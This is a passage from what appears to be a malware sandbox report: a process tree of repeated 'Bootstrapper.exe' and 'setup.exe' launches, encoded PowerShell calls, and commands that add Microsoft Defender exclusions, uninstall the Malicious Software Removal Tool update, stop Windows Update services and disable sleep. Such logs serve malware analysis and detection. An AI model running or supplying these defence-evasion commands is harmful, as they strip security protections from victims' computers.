        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        121⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        121⤵
        
        PID:4720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        122⤵
        
        PID:4740
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        122⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        123⤵
        
        PID:8888
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        123⤵
        
        PID:8048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        124⤵
        
        PID:6872
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        124⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        125⤵
        
        PID:4844
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        125⤵
        
        PID:7404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        126⤵
        
        PID:5208
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        126⤵
        
        PID:9036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        127⤵
        
        PID:7916
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        127⤵
        
        PID:1036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        128⤵
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        128⤵
        
        PID:7092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        129⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        129⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        130⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        130⤵
        
        PID:8576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        131⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        131⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        132⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        132⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        133⤵
        
        PID:8244
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        133⤵
        
        PID:5100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        134⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        134⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        135⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        135⤵
        
        PID:8040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        136⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        136⤵
        
        PID:5940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        137⤵
        
        PID:6956
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        137⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        137⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        136⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        135⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        134⤵
        
        PID:8744
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        133⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        132⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        131⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        130⤵
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        129⤵
        
        PID:7316
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        128⤵
        
        PID:7260
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        127⤵
        
        PID:6664
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        126⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        125⤵
        
        PID:7184
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        124⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        123⤵
        
        PID:6348
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        122⤵
        
        PID:8784
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        121⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        120⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        119⤵
        
        PID:7808
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        118⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        117⤵
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        116⤵
        
        PID:8116
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        115⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        114⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        113⤵
        
        PID:9000
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        112⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        111⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        110⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        109⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        108⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        107⤵
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        106⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        105⤵
        
        PID:8380
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        104⤵
        
        PID:7140
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        103⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        102⤵
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        101⤵
        
        PID:4032
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        102⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        100⤵
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        99⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        98⤵
        
        PID:8068
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        97⤵
        
        PID:7180
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        96⤵
        
        PID:8248
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        95⤵
        
        PID:7956
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        94⤵
        
        PID:5684
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        93⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        92⤵
        
        PID:7924
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        91⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        90⤵
        
        PID:7436
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        89⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        88⤵
        
        PID:6724
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        87⤵
        
        PID:6044
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        86⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        85⤵
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        84⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        83⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        82⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        81⤵
        
        PID:1092
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        80⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        79⤵
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        78⤵
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        77⤵
        
        PID:6060
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        76⤵
        
        PID:9100
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        75⤵
        
        PID:7772
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        74⤵
        
        PID:8612
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        73⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        72⤵
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        71⤵
        
        PID:7820
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        70⤵
        
        PID:8488
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        69⤵
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        68⤵
        
        PID:8028
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        67⤵
        
        PID:7740
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        66⤵
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        65⤵
        
        PID:6272
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        64⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        63⤵
        
        PID:7200
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        62⤵
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        61⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        60⤵
        
        PID:7084
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        59⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        58⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        57⤵
        
        PID:5448
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        58⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        58⤵
        
        PID:1948
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        59⤵
        
        PID:2264
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        58⤵
        Launches sc.exe
        
        PID:4980
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        58⤵
        Launches sc.exe
        
        PID:5508
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        58⤵
        Launches sc.exe
        
        PID:5420
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        58⤵
        Launches sc.exe
        
        PID:5684
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        58⤵
        Launches sc.exe
        
        PID:6152
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        58⤵
        Power Settings
        
        PID:5332
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        58⤵
        Power Settings
        
        PID:8960
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        58⤵
